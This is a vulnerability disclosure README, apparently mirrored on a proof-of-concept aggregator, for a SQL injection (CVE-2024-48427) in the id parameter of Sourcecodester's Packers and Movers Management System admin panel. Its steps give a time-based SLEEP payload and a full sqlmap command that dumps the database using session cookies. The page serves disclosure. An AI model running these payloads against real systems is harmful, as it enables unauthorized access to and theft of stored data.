来源

关联漏洞

介绍

# CVE-2024-48427

### Description
A SQL injection vulnerability in Sourcecodester Packers and Movers Management System v1.0 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in /mpms/admin/?page=services/manage_service&id

### Vulnerability Type
SQL Injection

### Vendor of Product
Sourcecodester

### Affected Product Code Base: 
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

### Affected Component: 
The id parameter of Update Service Details at /mpms/admin/?page=services/manage_service&id

### Attack Vectors:
1) Setup the application locally and login to the admin panel using the given default credentials.
2) Navigate to the Vulnerable Page: http://localhost/mpms/admin/?page=services/manage_service&id=2
3) Inject SQL Payload to the id parameter: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
4) Observe the Application Response: The page should take noticeably longer (5 seconds) to load if the injection is successful, confirming that the id parameter is vulnerable to SQL injection.
5) Now run SQLMap Tool For Dumping Database Details:
6) sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump


### Reference: 
1) https://owasp.org/www-community/attacks/SQL_Injection
2) https://portswigger.net/web-security/sql-injection

文件快照

 [4.0K]  /data/pocs/2ca2f6409307be6d52b5aa41cd3fb95f821cd0f2
└── [1.5K]  README.md

0 directories, 1 file

备注